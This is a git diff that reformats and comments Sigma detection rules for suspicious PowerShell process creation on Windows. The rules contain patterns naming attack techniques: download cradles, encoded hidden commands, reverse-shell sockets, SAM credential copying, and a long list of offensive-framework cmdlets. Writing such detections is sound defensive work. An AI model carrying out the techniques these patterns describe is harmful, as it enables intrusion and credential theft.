b/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml @@ -22,7 +22,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' | iex;' - ' | iex ' - ' | iex}' @@ -31,11 +31,11 @@ detection: - ' | IEX (new' - ');IEX ' selection_combined_2: - CommandLine|contains: + CommandLine|contains: - ::FromBase64String - '.GetString([System.Convert]::' selection_standalone: - CommandLine|contains: + CommandLine|contains: - )|iex;$ - );iex($ - );iex $ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml index 782916a03..d15ba22c9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml @@ -1,8 +1,7 @@ title: Root Certificate Installed From Susp Locations id: 5f6a601c-2ecb-498b-9c33-660362323afa status: test -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps @@ -21,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Certificate - ' -FilePath ' - Cert:\LocalMachine\Root - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - :\Windows\TEMP\ - \Desktop\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml index 76dd0b9b8..2ef00614e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml @@ -1,8 +1,8 @@ title: Import PowerShell Modules From Suspicious Directories - ProcCreation id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 related: - - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab - type: similar + - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab + type: similar status: test description: Detects powershell scripts that import modules from suspicious directories references: @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Import-Module "$Env:Temp\ - Import-Module '$Env:Temp\ - Import-Module $Env:Temp\ @@ -29,6 +29,7 @@ detection: - Import-Module '$Env:Appdata\ - Import-Module $Env:Appdata\ - Import-Module C:\Users\Public\ + # Import-Module alias is "ipmo" - ipmo "$Env:Temp\ - ipmo '$Env:Temp\ - ipmo $Env:Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml index 47ae2142c..e715e972a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml @@ -1,11 +1,10 @@ title: Unsigned AppX Installation Attempt Using Add-AppxPackage id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a related: - - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 - type: similar + - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 + type: similar status: test -description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" - to install unsigned AppX packages +description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages references: - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package - https://twitter.com/WindowsDocs/status/1620078135080325122 @@ -23,18 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Add-AppPackage ' - 'Add-AppxPackage ' selection_flag: - CommandLine|contains: ' -AllowUnsigned' + CommandLine|contains: ' -AllowUnsigned' condition: process_creation and (all of selection_*) falsepositives: - Installation of unsigned packages for testing purposes diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml index af0a8d7a7..8cc2bf5ad 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml @@ -1,12 +1,12 @@ title: Suspicious PowerShell Invocations - Specific - ProcessCreation id: 536e2947-3729-478c-9903-745aaffe60d2 related: - - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c - type: derived - - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 - type: similar - - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 - type: similar + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived + - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 + type: similar + - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Nasreddine Bencherchali (Nextron Systems) @@ -22,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_convert_b64: - CommandLine|contains|all: + CommandLine|contains|all: - -nop - ' -w ' - hidden - ' -c ' - '[Convert]::FromBase64String' selection_iex: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -noni @@ -38,20 +38,20 @@ detection: - iex - New-Object selection_enc: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -ep - bypass - -Enc selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - reg - add - \software\ selection_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - bypass - -noprofile - -windowstyle @@ -60,13 +60,13 @@ detection: - system.net.webclient - .download selection_iex_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - iex - New-Object - Net.WebClient - .Download filter_chocolatey: - CommandLine|contains: + CommandLine|contains: - (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1 - Write-ChocolateyWarning condition: process_creation and (1 of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml index 5860c4ff5..8ce17c605 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml @@ -1,8 +1,7 @@ title: Suspicious Invoke-WebRequest Execution With DirectIP id: 1edff897-9146-48d2-9066-52e8d8f80a2f status: experimental -description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct - IP access +description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software author: Nasreddine Bencherchali (Nextron Systems) @@ -19,20 +18,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_ip: - CommandLine|contains: + # In case of FP with local IPs add additional filters + CommandLine|contains: - ://1 - ://2 - ://3 diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml index 53c0453f2..c37b4f959 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml @@ -1,11 +1,10 @@ title: Suspicious Invoke-WebRequest Execution id: 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc related: - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 + type: derived status: experimental -description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output - is located in a suspicious location +description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,24 +22,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ur' - ' -o' selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\ - \Desktop\ - \Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml index 1adebd8cd..920a6dbe4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml @@ -1,8 +1,7 @@ title: Suspicious PowerShell Mailbox Export to Share id: 889719ef-dd62-43df-86c3-768fb08dc7c0 status: test -description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports - a mailbox to a remote or local share, as used in ProxyShell exploitations +description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations references: - https://youtu.be/5mqid-7zp8k?t=2481 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - New-MailboxExportRequest - ' -Mailbox ' - ' -FilePath \\\\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml index c45d25821..6b267fe06 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml @@ -1,10 +1,10 @@ title: Malicious PowerShell Commandlets - ProcessCreation id: 02030f2f-6199-49ec-b258-ea71b07e03dc related: - - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - type: derived - - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c - type: similar + - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + type: derived + - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c + type: similar status: experimental description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: @@ -14,9 +14,9 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP @@ -49,7 +49,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Note: Please ensure alphabetical order when adding new entries + CommandLine|contains: - Add-Exfiltration - Add-Persistence - Add-RegBackdoor @@ -74,7 +75,7 @@ detection: - Find-Fruit - Find-GPOLocation - Find-TrustedDocuments - - Get-ADIDNS + - Get-ADIDNS # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone - Get-ApplicationHost - Get-ChromeDump - Get-ClipboardContents @@ -143,7 +144,7 @@ detection: - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem @@ -167,7 +168,7 @@ detection: - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP @@ -186,7 +187,7 @@ detection: - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler @@ -232,7 +233,7 @@ detection: - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Set-MacAttribute - Set-MachineAccountAttribute - Set-Wallpaper diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml index 021298c5d..ec9ca368d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml @@ -1,8 +1,8 @@ title: MSExchange Transport Agent Installation id: 83809e84-4475-4b69-bc3e-4aad8568612f related: - - id: 83809e84-4475-4b69-bc3e-4aad8568612f - type: similar + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: similar status: test description: Detects the Installation of a Exchange Transport Agent references: @@ -22,12 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: Install-TransportAgent + CommandLine|contains: Install-TransportAgent condition: process_creation and selection fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml index f650ffc97..2f159e718 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml @@ -1,8 +1,7 @@ title: Non Interactive PowerShell Process Spawned id: f4bbd493-b796-416e-bbf2-121235348529 status: test -description: Detects non-interactive PowerShell activity by looking at the "powershell" - process with a non-user GUI process such as "explorer.exe" as a parent. +description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. references: - https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) @@ -20,30 +19,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll filter_main_generic: ParentImage|endswith: - :\Windows\explorer.exe - :\Windows\System32\CompatTelRunner.exe - :\Windows\SysWOW64\explorer.exe filter_main_windows_update: - ParentImage: :\$WINDOWS.~BT\Sources\SetupHost.exe + ParentImage: :\$WINDOWS.~BT\Sources\SetupHost.exe # During Windows updates/upgrades + # CommandLine: powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1'; filter_optional_vscode: + # Triggered by VsCode when you open a Shell inside the workspace ParentImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe ParentCommandLine|contains: ' --ms-enable-electron-run-as-node ' filter_optional_terminal: ParentImage|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal_ ParentImage|endswith: \WindowsTerminal.exe - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB - scripts which may trigger this rule often. It is best to add additional filters - or use this to hunt for anomalies + - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml index 07158966f..223b75a54 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: (WCHAR)0x + CommandLine|contains: (WCHAR)0x condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml index 342d21fc5..fa9e65efd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml @@ -1,8 +1,7 @@ title: Execution of Powershell Script in Public Folder id: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4 status: test -description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" - folder +description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder references: - https://www.mandiant.com/resources/evolution-of-fin7 author: Max Altgelt (Nextron Systems) @@ -23,7 +22,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - -f C:\Users\Public - -f "C:\Users\Public - -f %Public% diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml index bd32ed72a..462d00240 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml @@ -1,16 +1,14 @@ title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 related: - - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 - type: similar - - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 - type: similar - - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 - type: similar + - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic + type: similar + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module + type: similar + - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock + type: similar status: test -description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" - which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom - PowerShell code via module load-order hijacking. +description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 @@ -29,7 +27,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Invoke-ATHRemoteFXvGPUDisablementCommand - Invoke-ATHRemoteFXvGPUDisableme condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml index 017c1edcc..18ae4e5d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml @@ -1,9 +1,7 @@ title: Potential Powershell ReverseShell Connection id: edc2f8ae-2412-4dfd-b9d5-0c57727e70be status: stable -description: Detects usage of the "TcpClient" class. Which can be abused to establish - remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" - reverse shell and other. +description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -23,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' Net.Sockets.TCPClient' - .GetStream( - .Write( diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml index 93ba44050..00c212193 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml @@ -25,7 +25,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains|all: + CommandLine|contains|all: - Get-Content - -Stream condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml index d115dc8e8..f65d154a2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml @@ -24,7 +24,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|re: \s-\s*< + CommandLine|re: \s-\s*< condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml index d610ee632..61fbc6dce 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml @@ -19,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - \HarddiskVolumeShadowCopy - System32\config\sam selection_2: - CommandLine|contains: + CommandLine|contains: - Copy-Item - cp $_. - cpi $_. diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml index 3898e0885..242b48980 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml @@ -1,8 +1,7 @@ title: Suspicious PowerShell Invocation From Script Engines id: 95eadcb2-92e4-4ed1-9031-92547773a6db status: test -description: Detects suspicious powershell invocations from interpreters or unusual - programs +description: Detects suspicious powershell invocations from interpreters or unusual programs references: - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml index 52c432a12..c12261e48 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml @@ -1,12 +1,10 @@ title: Suspicious Service DACL Modification Via Set-Service Cmdlet id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: derived + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 + type: derived status: test -description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using - the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can - be used to hide services or make them unstopable +description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings @@ -24,17 +22,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \pwsh.exe - - OriginalFileName: pwsh.dll + - Image|endswith: \pwsh.exe + - OriginalFileName: pwsh.dll selection_sddl_flag: - CommandLine|contains: + CommandLine|contains: - '-SecurityDescriptorSddl ' - '-sd ' selection_set_service: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Service ' - D;; - CommandLine|contains: + CommandLine|contains: - ;;;IU - ;;;SU - ;;;BA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml index 2aefae540..f1de1354a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml @@ -1,12 +1,12 @@ title: PowerShell Script Change Permission Via Set-Acl id: bdeb2cff-af74-4094-8426-724dc937f20a related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp + type: derived + - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: test description: Detects PowerShell execution to set the ACL of a file or a folder references: @@ -25,14 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cmdlet: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Acl ' - '-AclObject ' - '-Path ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml index 45ac73c66..5a32e3c82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml @@ -1,12 +1,12 @@ title: PowerShell Set-Acl On Windows Folder -id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 +id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: bdeb2cff-af74-4094-8426-724dc937f20a - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low + type: derived + - 